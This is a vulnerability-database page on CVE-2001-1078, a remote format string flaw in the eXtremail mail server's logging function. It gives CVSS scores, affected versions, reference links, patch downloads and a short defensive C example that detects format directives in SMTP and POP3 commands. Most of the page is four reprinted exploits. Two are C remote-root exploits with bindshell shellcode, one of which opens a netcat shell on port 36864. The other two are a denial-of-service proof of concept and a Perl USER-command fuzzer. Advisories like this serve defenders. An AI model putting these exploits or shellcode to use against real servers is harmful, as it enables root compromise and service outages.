CVE-2001-1078
CVSS 10.0
Published: 2001-06-21 00:00:00
Revised: 2008-09-10 15:09:37

[Original] Format string vulnerability in flog function of eXtremail 1.1.9 and earlier allows remote attackers to gain root privileges via format specifiers in the SMTP commands (1) HELO, (2) EHLO, (3) MAIL FROM, or (4) RCPT TO, and the POP3 commands (5) USER and (6) other commands that can be executed after POP3 authentication.


[CNNVD] eXtremail remote format string overflow (CNNVD-200106-114)

        CVE(CAN) ID: CAN-2001-1078

        eXtremail is a POP3/SMTP mail server; it is free but not open source. It runs on Linux and AIX.

        eXtremail's flog() function has a format string problem. A user can pass a format string to the server through SMTP or POP3 commands, and an attacker can thereby modify any accessible memory address.

        Because eXtremail runs with root privileges, a remote attacker can gain root remotely, or crash the eXtremail service.
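
The flog() pattern described above, as an added example that is not eXtremail's code: a hypothetical printf-style logger called once with the client's command text as the format (the vulnerable shape) and once with it as a %s argument (the fix), plus a defender-side check that flags format directives in the arguments of the commands the advisory names. The logger name flog, the buffer size and the sample lines are assumptions.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Hypothetical printf-style logger in the shape the advisory
 * describes: whatever arrives as fmt is handed to a *printf
 * function. This is an assumed stand-in, not eXtremail's flog(). */
static void flog(char *logline, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(logline, n, fmt, ap);
    va_end(ap);
}

/* Vulnerable call pattern: the client's command text *is* the
 * format string. "%%" collapses to "%", and "%x"/"%n" directives
 * would read or write memory behind the missing arguments. Only
 * "%%" is exercised here, so the call stays well defined. */
const char *log_command_vulnerable(const char *client_text)
{
    static char line[128];
    flog(line, sizeof line, client_text);   /* BUG: data used as format */
    return line;
}

/* Fixed call pattern: the client's text is a %s argument, so no
 * directive inside it is ever interpreted. */
const char *log_command_fixed(const char *client_text)
{
    static char line[128];
    flog(line, sizeof line, "%s", client_text);
    return line;
}

/* Defender-side check: count conversion directives in a string,
 * treating "%%" as a literal percent sign. */
int count_format_directives(const char *s)
{
    int count = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {      /* escaped percent: skip both */
            s++;
            continue;
        }
        count++;
    }
    return count;
}

/* Returns 1 when one of the commands the advisory names as
 * reaching flog() carries format directives in its argument. */
int smtp_pop3_line_suspicious(const char *line)
{
    static const char *const verbs[] = {
        "HELO ", "EHLO ", "MAIL FROM:", "RCPT TO:", "USER ", NULL
    };
    for (int i = 0; verbs[i]; i++) {
        size_t n = strlen(verbs[i]);
        if (strncasecmp(line, verbs[i], n) == 0)
            return count_format_directives(line + n) > 0;
    }
    return 0;   /* not one of the logged commands */
}

int main(void)
{
    /* Constructed sample lines, not captured traffic. */
    const char *samples[] = { "HELO mail.example.test",
        "RCPT TO:<100%%sure@example.test>", "MAIL FROM: aaaa%.123u%44$n" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-34s suspicious=%d\n", samples[i], smtp_pop3_line_suspicious(samples[i]));
    printf("vulnerable: %s\nfixed:      %s\n",
           log_command_vulnerable("EHLO 100%% done"), log_command_fixed("EHLO 100%% done"));
    return 0;
}
```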
        
        
        
        

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:extremail:extremail:1.1.5
cpe:/a:extremail:extremail:1.0.1
cpe:/a:extremail:extremail:1.0.2
cpe:/a:extremail:extremail:1.0.3
cpe:/a:extremail:extremail:1.1.4
cpe:/a:extremail:extremail:1.1.7
cpe:/a:extremail:extremail:1.1
cpe:/a:extremail:extremail:1.0
cpe:/a:extremail:extremail:1.1.3
cpe:/a:extremail:extremail:1.1.1
cpe:/a:extremail:extremail:1.1.8
cpe:/a:extremail:extremail:1.1.2
cpe:/a:extremail:extremail:1.1.9
cpe:/a:extremail:extremail:1.1.6

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1078
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1078
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200106-114
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/static/6733.php
(VENDOR_ADVISORY)  XF  extremail-flog-format-string(6733)
http://www.securityfocus.com/bid/2908
(VENDOR_ADVISORY)  BID  2908
http://www.extremail.com/news.htm
(UNKNOWN)  CONFIRM  http://www.extremail.com/news.htm
http://www.extremail.com/history.htm
(UNKNOWN)  CONFIRM  http://www.extremail.com/history.htm
http://archives.neohapsis.com/archives/bugtraq/2001-06/0291.html
(UNKNOWN)  BUGTRAQ  20010622 eXtremail Remote Format String ('s)

- Vulnerability information

eXtremail remote format string overflow
Critical    Input validation
2001-06-21 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

Vendor patch:

eXtremail 1.1.10 has fixed this issue:

eXtremail upgrade i386 Linux (tarball):
http://www.extremail.com/ftp/linux/eXtremail-1.1-10.tar.gz

eXtremail upgrade i386 Linux (deb):
http://www.extremail.com/ftp/linux/extremail_1.1-10_i386.deb

eXtremail RPM i386 Linux (rpm):
http://www.extremail.com/ftp/linux/eXtremail-1.1-10.i686.rpm

- Vulnerability information (49)

Linux eXtremail 1.5.x Remote Format Strings Exploit (EDBID:49)
linux remote
2003-07-02 Verified
25 B-r00t
/****************************************************************/
/*      Linux eXtremail 1.5.x Remote Format Strings Exploit     */
/*                                                              */
/*                  By B-r00t - 02/07/2003                      */
/*                                                              */
/*  Versions:  Linux eXtremail-1.5-8 => VULNERABLE              */
/*             Linux eXtremail-1.5-5 => VULNERABLE              */
/*  Exploit uses format strings bug in fLog() of smtpd to bind  */
/*  a r00tshell to port 36864 on the target eXtremail server.   */
/*                                                              */
/****************************************************************/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>

#define EXPLOIT "eXtreme"
#define DEST_PORT 25

// Prototypes
int get_sock (char *host);
int send_sock (char *stuff);
int read_sock (void);
void usage (void);
int do_it (void);

// Globals
int socketfd, choice;
unsigned long GOT, RET;
char *myip;
char helo[] = "HELO Br00t~R0x~Y3r~W0rld!\n";
char shellcode[] = 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
"\x40\x89\xc3\x89\x46\x0c\x40\x89"
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
"\x80\x43\xc6\x46\x10\x10\x88\x46"
"\x08\x31\xc0\x31\xd2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e"
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43"
"\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\x86"
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
"\x80\x88\x56\x07\x89\x76\x0c\x87"
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
"\xe8\x8d\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68";


struct {
        char *systemtype;
        unsigned long got;
        unsigned long ret;
        int pad;
        int buf;
        int pos;
} targets[] = {
	// Confirmed targets tested by B-r00t.
        { "RedHat 7.2 eXtremail V1.5 release 5 (eXtremail-1.5-5.i686.rpm)",   0x0813b19c, 0xbefff1e8, 1, 266, 44},
        { "Linux ANY eXtremail V1.5 release 5 (eXtremail-1.5-5.tar.gz)",   0x0813b19c, 0xbefff1b8, 1, 266, 44},
        { "Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS)",   0xbefff0c8, 0xbefff1d4, 1, 266, 44},
        { "eXtremail V1.5 DEBUG",   0x44434241, 0xaaaaaaaa, 1, 266, 44},
        { 0 }
        };

int main ( int argc, char *argv[] )
{
char *TARGET = "TARGET";

printf ("\n%s by B-r00t <br00t@blueyonder.co.uk>. (c) 2003\n", EXPLOIT);

if (argc < 3) 
usage ();

choice = atoi(argv[2]);
if (choice < 0 || choice > 3) 
usage ();

setenv (TARGET, argv[1], 1);

get_sock(argv[1]);
sleep (1);
read_sock ();
sleep (1);
send_sock (helo);
sleep (1);
read_sock ();
sleep(1);
do_it ();
return 0;
}


void usage (void)
{
        int loop;
	printf ("\nUsage: %s [IP_ADDRESS] [TARGET]", EXPLOIT);
        printf ("\nExample: %s 10.0.0.1 2 \n", EXPLOIT);
	for (loop = 0; targets[loop].systemtype; loop++)
			printf ("\n%d\t%s", loop, targets[loop].systemtype);
        printf ("\n\nOn success a r00tshell will be spawned on port 36864.\n\n");
	exit (-1);
        }


int get_sock (char *host) 
{
struct sockaddr_in dest_addr;

if ((socketfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
        perror("Socket Error!\n");
        exit (-1);
        }

dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(DEST_PORT);
if (! inet_aton(host, &(dest_addr.sin_addr))) {
        perror("inet_aton problems\n");
        exit (-2);
        }

memset( &(dest_addr.sin_zero), '\0', 8);
if (connect (socketfd, (struct sockaddr *)&dest_addr, sizeof (struct sockaddr)) == -1){
        perror("Connect failed!\n");
        close (socketfd);
        exit (-3);
        }
printf ("\n\nConnected to %s\n", host);
}



int send_sock (char *stuff) 
{
	int bytes;
        bytes = (send (socketfd, stuff, strlen(stuff), 0));
        if (bytes == -1) {
        perror("Send error");
        close (socketfd);
        exit(4);
	}
printf ("Send:\t%s", stuff);
return bytes;
}


int read_sock (void) 
{
        int bytes;
	char buffer[200];
	char *ptr;
	ptr = buffer;
	memset (buffer, '\0', sizeof(buffer));
        bytes = (recv (socketfd, ptr, sizeof(buffer), 0));
        if (bytes == -1) {
        perror("send error");
        close (socketfd);
        exit(4);
	}
printf ("Recv:\t%s", buffer);
return bytes;
}


int do_it (void)
{
char format[200], buf[500], *bufptr, *p;
int loop, sofar = 0;
int PAD = targets[choice].pad;
int POS = targets[choice].pos;
unsigned char r[4], g[4], w[4];   /* one byte per position: indexed 0..3 below */

RET = targets[choice].ret;
r[0] = (int) (RET & 0x000000ff);
r[1] = (int)((RET & 0x0000ff00) >> 8);
r[2] = (int)((RET & 0x00ff0000) >> 16);
r[3] = (int)((RET & 0xff000000) >> 24);

GOT = targets[choice].got;
g[0] = (int) (GOT & 0x000000ff);
g[1] = (int)((GOT & 0x0000ff00) >> 8);
g[2] = (int)((GOT & 0x00ff0000) >> 16);
g[3] = (int)((GOT & 0xff000000) >> 24);


// Start buf
bufptr = buf;
bzero (bufptr, sizeof(buf));
strncpy (buf, "mail from: ", strlen("mail from: "));
sofar = 19;

// Do padding
for (loop=0; loop<PAD; loop++)
strncat (buf, "a", 1);
sofar = sofar+PAD;

//1st GOT addy
strncat (buf, g, 4);

//2nd GOT addy
p = &g[0];
(*p)++;
strncat (buf, g, 4);

// 3rd GOT addy
p = &g[0];
(*p)++;
strncat (buf, g, 4);

// 4th GOT addy
p = &g[0];
(*p)++;
strncat (buf, g, 4);
sofar = sofar+16;

for (loop=0; loop<4; loop++) {
			if (r[loop] > sofar) {
						w[loop] = r[loop]-sofar;
						} else
			if (r[loop] == sofar) {
						w[loop] = 0;
						}else
			if (r[loop] < sofar) {
						w[loop] = (256-sofar)+r[loop];
						}
			sofar = sofar+w[loop];
			}

bufptr = format;
bzero (bufptr, sizeof(format));
sprintf (bufptr, "%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n", w[0], POS, w[1], POS+1, w[2], POS+2, w[3], POS+3);
strncat (buf, format, sizeof(format));
strncat (buf, shellcode, sizeof(shellcode));

// Summarise
printf ("\nSystem type:\t\t%s", targets[choice].systemtype);
printf ("\nWrite Addy:\t\t0x%x", GOT);
printf ("\nRET (shellcode):\t0x%x", RET);
printf ("\nPAD (alignment):\t%d", PAD);
printf ("\nPayload:\t\t%d / %d max bytes", strlen(buf), targets[choice].buf);
printf ("\nSending it ... \n");
sleep(1);

// Ok lets Wack it!
send_sock (buf);
sleep (1);
close (socketfd);
printf ("\nUsing netcat 'nc' to get the r00tshell on port 36864 ....!!!!!\n\n\n");
sleep(3); // May take time to spawn a shell
system("nc -vv ${TARGET} 36864 || echo 'Sorry Exploit failed!'");
exit (0);
}

// milw0rm.com [2003-07-02]
		

- Vulnerability information (20952)

eXtremail 1.x/2.1 Remote Format String Vulnerability (1) (EDBID:20952)
linux dos
2001-06-21 Verified
0 Luca Ercoli
source: http://www.securityfocus.com/bid/2908/info

eXtremail is a freeware SMTP server available for Linux and AIX.

eXtremail contains a format-string vulnerability in its logging mechanism. Attackers can send SMTP commands with maliciously constructed arguments that exploit this vulnerability.

eXtremail runs with root privileges. By exploiting this vulnerability, remote attackers can gain superuser access on the underlying host and can crash eXtremail. If the system is not restarted automatically, a denial of SMTP service will result.

UPDATE (April 26, 2004): Reportedly, this vulnerability has been reintroduced into the new version (1.5.9) of eXtremail.

UPDATE (October 26, 2007): Reports indicate that the 'USER' command of eXtremail 2.1.1 and prior is still vulnerable. Symantec has not confirmed this. 

/**********************************************
*  Proof of Concept                           *
*  eXtremail 1.5.x Denial of Service          *
*                                             *
*  Luca Ercoli  <luca.e [at] seeweb.com>      *
*  Seeweb          http://www.seeweb.com      *
*                                             *
***********************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 143
#define MAXRECVSIZE 100


int main(int argc, char *argv[]);
void crash(char *host,int TYPE);


int numbytes;



void crash(char *host,int TYPE)
{

 int sockfd;
 char buf[MAXRECVSIZE];
 struct hostent *he;
 struct sockaddr_in their_addr;
 char poc[]="1 login %s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%n%n%n\n";


  if ((he=gethostbyname(host)) == NULL)
     {
      perror("gethostbyname");
      exit(1);
     }

  if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
     {
      perror("socket");
      exit(1);
     }

 their_addr.sin_family = AF_INET;
 their_addr.sin_port = htons(PORT);
 their_addr.sin_addr = *((struct in_addr *)he->h_addr);
 memset(&(their_addr.sin_zero), '\0', 8);

  if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
     {
      perror("connect");
      exit(1);
     }


  if ((numbytes=recv(sockfd, buf, MAXRECVSIZE-1, 0)) == -1)
     {
      perror("recv");
      exit(1);
     }

 buf[numbytes] = '\0';

  if (TYPE == 0)
     {
      printf("[+] Server -> %s",buf);
      sleep(1);
      printf("\n[!] Sending malicious packet...\n");

      send(sockfd,poc, strlen(poc), 0);
      sleep(1);
      printf ("\n[+] Sent!\n");
     }

 close(sockfd);

}



int main(int argc, char *argv[])
{

 printf("\n\n  eXtremail 1.5.x Denial of Service  \n");
 printf("by Luca Ercoli <luca.e [at] seeweb.com>\n\n\n\n");


  if (argc != 2)
   {
    fprintf(stderr,"\nUsage -> %s hostname\n\n",argv[0]);
    exit(1);
   }

 crash(argv[1],0);
 numbytes=0;
 printf ("\n[+] Checking server status ...\n");


 /* numbytes is only updated inside the forked child; the parent's copy
    stays 0, so this message does not reflect the second connection's result. */
 if(!fork()) crash(argv[1],1);
 sleep(5);
 if (numbytes == 0) printf ("\n[!] Smtpd/Pop3d/Imapd/Remt crashed!\n\n\n");

 return 0;


}

		

- Vulnerability information (20953)

eXtremail 1.x/2.1 Remote Format String Vulnerability (2) (EDBID:20953)
linux remote
2001-06-21 Verified
0 mu-b
source: http://www.securityfocus.com/bid/2908/info

/* eXtremail-exp.c
 *
 * - eXtremail v1.1.5-9 Remote Root Exploit (x86) -
 *
 * - Tested on: RedHat 7.0 eXtremail v1.1.5
 *              RedHat 7.0 eXtremail v1.1.6
 *              RedHat 7.0 eXtremail v1.1.7
 *              RedHat 7.0 eXtremail v1.1.8
 *              RedHat 7.0 eXtremail v1.1.9
 *              NOT VULNERABLE eXtremail v1.1.10
 *
 * Copyright (c) 2001 by <mu-b@digit-labs.org>
 *
 * eXtremail v1.1.5+ has a format string problem
 * in flog(). This problem affects all user commands
 * (helo/ehlo/mail from:/rcpt to:), and is caused
 * by an improper fprintf() to the servers logfile.
 *
 * Buffers for helo/ehlo are too small (except v1.1.5),
 * therefore we use mail from: instead :). 
 *
 * Note: Return Address's are quite tight due to the small
 *       buffers. Returning to the Heap is possible but
 *       is VERY unstable.
 *
 * Greets: mjm, all@alldas.de, teleh0r, grazer, cmds, gollum, #!digit-labs
 *
 * http://www.digit-labs.org/ -- Digit-Labs 2001!@$!
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <resolv.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/stat.h>

#define NOP		0x41
#define NUMVULN	4
#define OFFSET	0
#define PORT	25

void banner();
void mkfmt();
int opensocket(char *);
void usage();

char buf[520];
int buflength, type = 0, sock;
unsigned long target, retaddr;

unsigned char shellcode[]= /* lamagra bindshell code */
	"\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
	"\x40\x89\xc3\x89\x46\x0c\x40\x89"
    	"\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
    	"\x80\x43\xc6\x46\x10\x10\x88\x46"
    	"\x08\x31\xc0\x31\xd2\x89\x46\x18"
    	"\xb0\x90\x66\x89\x46\x16\x8d\x4e"
    	"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
    	"\x66\xcd\x80\x89\x5e\x0c\x43\x43"
    	"\xb0\x66\xcd\x80\x89\x56\x0c\x89"
    	"\x56\x10\xb0\x66\x43\xcd\x80\x86"
    	"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
    	"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
    	"\x80\x88\x56\x07\x89\x76\x0c\x87"
    	"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
    	"\xe8\x8d\xff\xff\xff\x2f\x62\x69"
    	"\x6e\x2f\x73\x68";

/*   target address's  -> objdump -R smtpd | grep "fflush"   */
struct {
	char *name;
	unsigned long target;
	unsigned long retaddr;
	int padding;
	int buflength;
} targets[] = {
        { "RedHat 7.0 eXtremail v1.1R5", 0x080864e0, 0xbf1ff64a, 1, 500},
        { "RedHat 7.0 eXtremail v1.1R6", 0x08089d5c, 0xbf1ff5d6, 1, 266},
        { "RedHat 7.0 eXtremail v1.1R7", 0x0808b3fc, 0xbf1ff5d6, 1, 266},
        { "RedHat 7.0 eXtremail v1.1R8", 0x0808b6fc, 0xbf1ff5d6, 1, 266},
        { "RedHat 7.0 eXtremail v1.1R9", 0x08088890, 0xbf1ff5d6, 1, 266},
        { 0 } };

void banner()
{
   fprintf(stderr, "\neXtremail V1.1R5-9 remote root exploit\n");
   fprintf(stderr, "by: <mu-b@digit-labs.org>\n");
   fprintf(stderr, "Copyright (c) 2001 Digit-Labs!@#$!\n");
   fprintf(stderr, "http://www.digit-labs.org\n\n");
}

void mkfmt()
{
   int i, j = 0, num;
   int bytesofar;
   int fmtints[4];
   char *bufptr;
   unsigned char temp[4];

   bytesofar = 35 + targets[type].padding;
   bufptr = &buf[strlen(buf)];

   temp[0] = (unsigned char) (target & 0x000000ff);
   temp[1] = (unsigned char)((target & 0x0000ff00) >> 8);
   temp[2] = (unsigned char)((target & 0x00ff0000) >> 16);
   temp[3] = (unsigned char)((target & 0xff000000) >> 24);

   for(i = 0; i < 4; i++)
   {
      sprintf(bufptr, "%c%c%c%c", temp[0], temp[1], temp[2], temp[3]);
      bufptr += 4;
      temp[0]++;
   }

   fmtints[0] = (int) (retaddr & 0x000000ff);
   fmtints[1] = (int)((retaddr & 0x0000ff00) >> 8);
   fmtints[2] = (int)((retaddr & 0x00ff0000) >> 16);
   fmtints[3] = (int)((retaddr & 0xff000000) >> 24);
   
   for(i = 0; i < 4; i++)
   {
      num = 0;

      if(fmtints[i] - bytesofar < 10)
      {
         while(num != 1)
         {
            fmtints[i] = (fmtints[i] + 0x100);
            if(fmtints[i] - bytesofar > 9)
            {
               fmtints[i] -= bytesofar;
               bytesofar += fmtints[i];
               num = 1;
            }
         }
      }
      else
      {
         fmtints[i] -= bytesofar;
         bytesofar += fmtints[i];
      }
   }

   sprintf(bufptr, "%%.%du%%38$n%%.%du%%39$n%%.%du%%40$n%%.%du%%41$n", fmtints[0], fmtints[1], fmtints[2], fmtints[3]);

   for(i = strlen(buf); i < buflength - strlen(shellcode) - 1; i++)
      buf[i] = NOP;

   for(i = i; i < buflength - 1; i++)
   {
      buf[i] = shellcode[j];
      j++;
   }

   buf[buflength - 1] = '\n';
   buf[buflength] = '\0';
   write(sock, buf, strlen(buf));
}

int opensocket(char *host)
{
   int s;
   struct sockaddr_in remote_sin;
   struct hostent *he;

   if((s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
      perror("socket()");
      return -1;
   }

   memset((char *)&remote_sin, 0, sizeof(remote_sin));
   if((he = gethostbyname(host)) != NULL)
      memcpy((char *)&remote_sin.sin_addr, he->h_addr, he->h_length);
   else if((remote_sin.sin_addr.s_addr = inet_addr(host)) < 0) {
         perror("gethostbyname()/inet_addr()");
         return -1;
   }

   remote_sin.sin_family = PF_INET;
   remote_sin.sin_port = htons(PORT);

   if(connect(s, (struct sockaddr *)&remote_sin, sizeof(remote_sin)) == -1) {
      perror("connect()");
      close(s);
      return -1;
   }
	      
   return s;
}

void usage()
{
   int i;

   fprintf(stderr, "Usage: ./extremail <host> [type]\n");
   fprintf(stderr, "\nTargets:\n");

   for (i = 0; targets[i].name; i++)
      fprintf(stderr, "\t%d.\t%s\n", i, targets[i].name);

   fprintf(stderr, "\n");	
   exit(0);
}

int main (int argc, char *argv[])
{
   char *host;
   int i;

   banner();

   if(argc < 2)
      usage();
  
   if(argc >= 3)
      type = atoi(argv[2]);

   if(type > NUMVULN)
      type = 0;
   
   host = argv[1];
   buflength = targets[type].buflength;
   target = targets[type].target;
   retaddr = targets[type].retaddr + OFFSET;

   fprintf(stderr, "Target:\t\t%s\nType:\t\t%s\n", host, targets[type].name);
   fprintf(stderr, "Target Address:\t%p\nReturn Address:\t%p\nOffset:\t\t%d\n", target, retaddr, OFFSET);
   fprintf(stderr, "Buflength:\t%d\n", buflength);   

   if ((sock = opensocket(host)) <= 0)
      return -1;

   fprintf(stderr, "\nConnected....\n");

   memcpy(buf, "MAIL FROM:<", 11);
   
   for(i = 0; i < targets[type].padding; i++)
      buf[strlen(buf)] = 0x61;

   sleep(1);
   write(sock, "HELO digit-labs.org!@#$!\n", 26);

   sleep(1);
   mkfmt();

   sleep(1);
   close(sock);

   fprintf(stderr, "\n[1] sent payload....\n");
   fprintf(stderr, "[2] waiting....\n");
   sleep(2);
   fprintf(stderr, "[3] nc %s 36864 for shell....\n\n", host);

   return 0;
}
		

- Vulnerability information (20954)

eXtremail 1.x/2.1 Remote Format String Vulnerability (3) (EDBID:20954)
linux remote
2006-10-06 Verified
0 mu-b
source: http://www.securityfocus.com/bid/2908/info

#!/usr/bin/perl
#
# extremail-v3.pl
#
# Copyright (c) 2006 by <mu-b@digit-labs.org>
#
# eXtremail <=2.1.1 remote root POC (x86-lnx)
# by mu-b - Fri Oct 06 2006
#
# Tested on: eXtremail 2.1.1 (lnx)
#            eXtremail 2.1.0 (lnx)
#
#    - Private Source Code -DO NOT DISTRIBUTE -
# http://www.digit-labs.org/ -- Digit-Labs 2006!@$!
########

use Getopt::Std; getopts('t:n:u:p:', \%arg);
use Socket;

&print_header;

my $target;

if (defined($arg{'t'})) { $target = $arg{'t'} }
if (!(defined($target))) { &usage; }

my $pop3_port = 110;
my $send_delay = 1;

my $NOP = 'A';

srand(time());
while (1) {
    if (connect_host($target, $pop3_port)) {
        # [0,50) -> [1,50]
        $max_len  = int(rand(50) + 1);

        # [0, $max_len * 0.75) -> [0, ($max_len * 0x75) - 1]
        $pad1_len = int(rand($max_len * 0.75));

        # [0, ($max_len - $pad1_len)/2) -> [1, ($max_len - $pad1_len)/2]
        $pad2_len = int(rand(($max_len - $pad1_len)/length("%s")) + 1);

        $pad3_len = $max_len - $pad1_len - ($pad2_len * length("%s"));

        $buf = "USER ".
               ($NOP x $pad1_len).
               ("%s" x $pad2_len).
               ($NOP x $pad3_len).
               "\n";
        print("-> * Sending: $max_len $pad1_len $pad2_len $pad3_len ".$buf);
        send(SOCKET, $buf, 0);
        sleep($send_delay);

        close(SOCKET);
    }
}

sub print_header {
    print("eXtremail <=2.1.1 remote root POC (x86-lnx)\n");
    print("by: <mu-b\@digit-labs.org>\n");
    print("http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
}

sub usage {
  print(qq(Usage: $0 -t <hostname>

     -t <hostname>    : hostname to test
));

    exit(1);
}

sub connect_host {
    ($target, $port) = @_;
    $iaddr  = inet_aton($target)                 || die("Error: $!\n");
    $paddr  = sockaddr_in($port, $iaddr)         || die("Error: $!\n");
    $proto  = getprotobyname('tcp')              || die("Error: $!\n");

    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
    connect(SOCKET, $paddr)                      || die("Error: $!\n");
    return(1338);
}
		

- Vulnerability information

14147
eXtremail Multiple SMTP Command flog Function Format String
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

2001-06-22 Unknown
2001-06-22 Unknown

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

eXtremail Remote Format String Vulnerability
Input Validation Error 2908
Yes No
2001-06-21 12:00:00 2007-10-26 09:36:00
Discovered by mu-b <mu-b@digit-labs.org>.

- Affected program versions

eXtremail eXtremail 2.1.1
eXtremail eXtremail 1.5.9
eXtremail eXtremail 1.5 -8
eXtremail eXtremail 1.5 -5
eXtremail eXtremail 1.5
eXtremail eXtremail 1.1.9
eXtremail eXtremail 1.1.8
eXtremail eXtremail 1.1.7
eXtremail eXtremail 1.1.6
eXtremail eXtremail 1.1.5
eXtremail eXtremail 1.1.4
eXtremail eXtremail 1.1.3
eXtremail eXtremail 1.1.2
eXtremail eXtremail 1.1.1
eXtremail eXtremail 1.1
eXtremail eXtremail 1.0.3
eXtremail eXtremail 1.0.2
eXtremail eXtremail 1.0.1
eXtremail eXtremail 1.0
eXtremail eXtremail 2.1
eXtremail eXtremail 1.1.10

- Unaffected program versions

eXtremail eXtremail 1.1.10

- Vulnerability discussion

eXtremail is a freeware SMTP server available for Linux and AIX.

eXtremail contains a format-string vulnerability in its logging mechanism. Attackers can send SMTP commands with maliciously constructed arguments that exploit this vulnerability.

eXtremail runs with root privileges. By exploiting this vulnerability, remote attackers can gain superuser access on the underlying host and can crash eXtremail. If the system is not restarted automatically, a denial of SMTP service will result.

UPDATE (April 26, 2004): Reportedly, this vulnerability has been reintroduced into the new version (1.5.9) of eXtremail.

UPDATE (October 26, 2007): Reports indicate that the 'USER' command of eXtremail 2.1.1 and prior is still vulnerable. Symantec has not confirmed this.

- Exploitation

Exploit code supplied by mu-b <mu-b@digit-labs.org>.

A second exploit has been released by B-r00t <br00t@blueyonder.co.uk>.

A proof-of-concept exploit has been released for eXtremail 1.5.9.

- Solution

Reportedly, eXtremail 1.5-9 fixes this vulnerability.

UPDATE (October 26, 2007): Reports indicate that the 'USER' command of eXtremail 2.1.1 and prior is still vulnerable. Symantec has not confirmed this.


- References

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are kept on MITRE's related websites.